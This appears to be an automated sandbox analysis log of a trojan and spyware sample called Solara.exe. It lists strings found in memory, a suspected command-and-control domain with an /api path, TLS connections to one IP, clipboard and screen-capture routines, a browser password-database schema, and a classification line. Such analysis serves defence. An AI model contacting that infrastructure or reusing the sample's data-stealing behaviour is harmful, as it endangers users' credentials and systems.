                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: Solara.exe, 00000002.00000002.2898617643.00000000054D0000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694613062.0000000002D4E000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/
                Source: Solara.exe, 00000002.00000003.1831492202.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/D
                Source: Solara.exe, 00000002.00000003.1768028999.0000000002DCC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/Z
                Source: Solara.exe, 00000002.00000003.1831492202.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000002.2898276489.0000000002DE5000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2456473541.0000000002DE4000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1694562958.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api
                Source: Solara.exe, 00000002.00000003.1792136717.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/api0u0u
                Source: Solara.exe, 00000002.00000003.1831492202.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiB&
                Source: Solara.exe, 00000002.00000003.1694562958.0000000002D5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/apiza2
                Source: Solara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/ndows
                Source: Solara.exe, 00000002.00000002.2898260079.0000000002DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz/s
                Source: Solara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/api
                Source: Solara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1792136717.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apiE_
                Source: Solara.exe, 00000002.00000002.2897998714.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1806487513.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.2454619814.0000000002D5D000.00000004.00000020.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1831530096.0000000002D5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mindhandru.buzz:443/apiRd
                Source: Solara.exe, 00000002.00000003.1695603213.0000000005564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Solara.exe, 00000002.00000003.1695669550.0000000005516000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695603213.0000000005562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Solara.exe, 00000002.00000003.1695669550.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Solara.exe, 00000002.00000003.1695669550.0000000005516000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695603213.0000000005562000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Solara.exe, 00000002.00000003.1695669550.00000000054F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Solara.exeString found in binary or memory: https://www.entrust.net/rpa0
                Source: Solara.exe, 00000002.00000003.1742691939.00000000054CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                Source: Solara.exe, 00000002.00000003.1695230625.0000000005508000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695152176.000000000550B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Solara.exe, 00000002.00000003.1742435372.00000000055EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.165.185:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004331A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004331A0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_051E1000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,2_2_051E1000
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004331A0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_004331A0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00433C95 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,2_2_00433C95
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_002010000_2_00201000
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020F5550_2_0020F555
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_002277920_2_00227792
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00225C5E0_2_00225C5E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00219CC00_2_00219CC0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_00213FB20_2_00213FB2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_002010002_2_00201000
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0020F5552_2_0020F555
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_002277922_2_00227792
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00225C5E2_2_00225C5E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00219CC02_2_00219CC0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00213FB22_2_00213FB2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043B0302_2_0043B030
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043F5602_2_0043F560
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004205002_2_00420500
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004086302_2_00408630
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0042B73E2_2_0042B73E
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0042187F2_2_0042187F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004228902_2_00422890
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00437A102_2_00437A10
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00411BB02_2_00411BB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040CC002_2_0040CC00
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043ECC02_2_0043ECC0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00425CD02_2_00425CD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00437D902_2_00437D90
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004110592_2_00411059
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040E0F02_2_0040E0F0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041608C2_2_0041608C
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041C0A02_2_0041C0A0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004211402_2_00421140
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004261702_2_00426170
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E1002_2_0043E100
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004081C02_2_004081C0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004061D02_2_004061D0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041B1DB2_2_0041B1DB
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004231802_2_00423180
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004341802_2_00434180
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004042702_2_00404270
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043F2202_2_0043F220
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004362202_2_00436220
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004372C02_2_004372C0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004092B02_2_004092B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E2B02_2_0043E2B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040C30B2_2_0040C30B
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004253D02_2_004253D0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041C3802_2_0041C380
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E3B02_2_0043E3B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004074302_2_00407430
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043849F2_2_0043849F
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E4B02_2_0043E4B0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004274B52_2_004274B5
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043E5402_2_0043E540
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043C5592_2_0043C559
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041457C2_2_0041457C
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004235202_2_00423520
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004375202_2_00437520
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004185AC2_2_004185AC
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004096502_2_00409650
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004066602_2_00406660
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004226722_2_00422672
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004236802_2_00423680
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004226902_2_00422690
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004387302_2_00438730
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043B7802_2_0043B780
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004247892_2_00424789
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041C7902_2_0041C790
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040A8402_2_0040A840
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004118502_2_00411850
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004038C02_2_004038C0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040E8D02_2_0040E8D0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_004058E02_2_004058E0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041F8A02_2_0041F8A0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0042B9AD2_2_0042B9AD
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00408A302_2_00408A30
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00418AD12_2_00418AD1
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00426AB12_2_00426AB1
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00417B692_2_00417B69
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00418BC22_2_00418BC2
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00404BA02_2_00404BA0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041CBB02_2_0041CBB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00415C662_2_00415C66
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0040ACD02_2_0040ACD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00427CDD2_2_00427CDD
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00428CAF2_2_00428CAF
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00430CB02_2_00430CB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00414D0A2_2_00414D0A
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00432D302_2_00432D30
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00435D3A2_2_00435D3A
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00418E402_2_00418E40
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00419E602_2_00419E60
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041CE002_2_0041CE00
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00402EC02_2_00402EC0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00413EB02_2_00413EB0
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0043EF502_2_0043EF50
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00438F692_2_00438F69
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00416F022_2_00416F02
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0042EF152_2_0042EF15
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0041DF202_2_0041DF20
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00432FD02_2_00432FD0
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 00413EA0 appears 73 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 00210730 appears 38 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 00407FC0 appears 44 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 0021CFD6 appears 40 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 0020FA60 appears 100 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 0020FAE4 appears 34 times
                Source: C:\Users\user\Desktop\Solara.exeCode function: String function: 002180F8 appears 42 times
                Source: Solara.exeStatic PE information: invalid certificate
                Source: Solara.exe, 00000000.00000002.1647778505.0000000005148000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara.exe
                Source: Solara.exe, 00000000.00000000.1639690706.000000000028D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara.exe
                Source: Solara.exe, 00000002.00000002.2897816136.000000000028D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara.exe
                Source: Solara.exe, 00000002.00000003.1647302941.00000000047C3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara.exe
                Source: Solara.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Solara.exe
                Source: Solara.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Solara.exeStatic PE information: Section: .bss ZLIB complexity 1.0003326570404723
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/1@1/1
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_00437D90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00437D90
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                Source: Solara.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\Solara.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Solara.exe, 00000002.00000003.1719096512.00000000054D7000.00000004.00000800.00020000.00000000.sdmp, Solara.exe, 00000002.00000003.1695341971.00000000054F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: C:\Users\user\Desktop\Solara.exeFile read: C:\Users\user\Desktop\Solara.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"
                Source: C:\Users\user\Desktop\Solara.exeProcess created: C:\Users\user\Desktop\Solara.exe "C:\Users\user\Desktop\Solara.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: Solara.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Solara.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Solara.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Solara.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Solara.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: Solara.exeStatic PE information: real checksum: 0x891a5 should be: 0x91a94
                Source: C:\Users\user\Desktop\Solara.exeCode function: 0_2_0020FB83 push ecx; ret 0_2_0020FB96
                Source: C:\Users\user\Desktop\Solara.exeCode function: 2_2_0020FB83 push ecx; ret 2_2_0020FB96
